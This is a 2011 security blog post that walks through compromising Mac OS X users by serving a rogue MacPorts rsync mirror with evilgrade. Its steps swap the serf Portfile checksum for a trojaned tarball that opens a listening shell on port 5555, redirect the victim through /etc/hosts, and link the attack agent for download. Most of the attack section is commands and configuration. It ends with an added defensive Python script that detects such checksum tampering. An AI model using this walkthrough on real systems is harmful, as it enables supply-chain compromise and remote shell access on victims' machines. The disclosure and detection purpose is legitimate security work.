Pwning Mac OS X with evilgrade + MacPorts

Faraday News, by Faraday. Published Jul 7, 2011.

The idea of this post is to show the flaws in the package distribution of the MacPorts project for Mac OS X.

MacPorts works as follows:

a) The ports tree (the local repository) is updated from an rsync server.

b) The packages themselves are downloaded via HTTP / FTP.

c) Before a new package is installed, it is checked against the MD5/SHA1 checksums stored in the local ports tree.

Note that the checksums used in c) arrive over the same unauthenticated rsync channel as the rest of the ports tree, so whoever controls that channel controls both the package and the hash it is checked against.

To perform the attack we need to do the following tasks:

1) Prepare the rsync server on the attacker’s machine (192.168.10.133) with a copy of all the files from rsync.macports.org:

mkdir -p /dev/evilgrade/release/ports
mkdir -p /dev/evilgrade/release/base

# Get the files from rsync.macports.org
/usr/bin/rsync -rtzv --delete-after --exclude=/PortIndex* rsync://rsync.macports.org/release/ports/ /dev/evilgrade/release/ports/
/usr/bin/rsync -rtzv --delete-after --exclude=/PortIndex* rsync://rsync.macports.org/release/base/ /dev/evilgrade/release/base/

2) Configure the file /etc/rsyncd.conf:

max connections = 20
log file = /var/log/rsync.log
timeout = 300

[release]
comment = Stuff
path = /dev/evilgrade/release/
read only = yes
list = yes
uid = nobody
gid = nogroup
# auth users = craig
# secrets file = /etc/rsyncd.secrets
# change for your subnet (rsyncd.conf does not accept trailing comments on a value line)
hosts allow = 192.168.10.0/24

3) Then start the rsync server: /etc/init.d/rsync start

4) In this case we attack the package serf in the www category. The idea is that when the victim installs this package, the payload opens a listening shell on port 5555.

Edit the repository file /dev/evilgrade/release/ports/www/serf/Portfile and replace the md5 checksum with the hash of our payload/agent, found in /evilgrade/agent/serf-0.7.2.tar.bz2.

You could also prepare the repository so that all Portfiles point to the same package with the same md5, so that any port installation infects the victim.

This agent has a line (132) in its Makefile.in that leaves a shell listening on port 5555.

5) On the victim machine (192.168.10.42), for this test, add the following line to /etc/hosts (or use any traffic-redirection attack instead):

192.168.10.133 serf.googlecode.com rsync.macports.org

6) Start evilgrade on the attacker machine (192.168.10.133).

7) On the victim machine run “sudo port selfupdate” and then “sudo port install serf”.

8) Verify that the attacker machine is receiving the rsync requests by reading /var/log/rsync.log.

Check what happened in evilgrade.

9) Enjoy your shell!

Download the MacPorts agent from http://www.infobytesec.com/down/macportsevilgrade.tar.gz and uncompress it in the evilgrade path.

Remember to keep your systems updated! ;)
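As an added defensive check (example code written for this edit, not part of the original post, of evilgrade or of MacPorts), the script below detects the fingerprint of step 4: a Portfile whose checksum lines changed between two rsync syncs while its version stayed the same. The Portfile contents are constructed samples in the simplified “checksums <alg> <hash>” form, not the real www/serf Portfile.

```python
import re
from typing import Dict, List

# Constructed sample Portfile (not MacPorts' real www/serf Portfile), in the
# simplified "checksums <alg> <hash> ..." form (no leading distfile name).
PORTFILE_BEFORE = """\
name                serf
version             0.7.2
master_sites        http://serf.googlecode.com/files/
checksums           md5     11111111111111111111111111111111 \\
                    sha1    2222222222222222222222222222222222222222
"""
# What a sync from a mirror that rewrote the md5 line would leave behind.
PORTFILE_TAMPERED = PORTFILE_BEFORE.replace("1" * 32, "f" * 32)
# A legitimate upgrade: same hash change, but the version moved too.
PORTFILE_BUMPED = PORTFILE_TAMPERED.replace("0.7.2", "0.7.3")

def parse_portfile(text: str) -> Dict[str, str]:
    """Return name, version, master_sites and one 'checksum.<alg>' entry
    per algorithm. Backslash-continued lines are joined first."""
    joined = re.sub(r"\\\n\s*", " ", text)
    fields: Dict[str, str] = {}
    for line in joined.splitlines():
        m = re.match(r"^(name|version|master_sites|checksums)\s+(.+?)\s*$", line)
        if not m:
            continue
        key, value = m.groups()
        if key == "checksums":
            toks = value.split()  # alternating algorithm / digest tokens
            for alg, digest in zip(toks[0::2], toks[1::2]):
                fields["checksum." + alg] = digest
        else:
            fields[key] = value
    return fields

def tamper_findings(before: Dict[str, str], after: Dict[str, str]) -> List[str]:
    """Flag the evilgrade-style substitution: a checksum or download site
    that changed between two syncs while the version stayed the same.
    A mirror that also bumps the version evades this, so treat it as one
    signal, not a guarantee."""
    if before.get("version") != after.get("version"):
        return []
    findings = []
    for key in sorted(set(before) | set(after)):
        if key.startswith("checksum.") and before.get(key) != after.get(key):
            findings.append(f"{key} changed without a version bump")
    if before.get("master_sites") != after.get("master_sites"):
        findings.append("master_sites changed without a version bump")
    return findings
```

Run it over a snapshot of the ports tree taken before and after each selfupdate; a hit on a port you did not upgrade is worth a look at the rsync source you are talking to.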
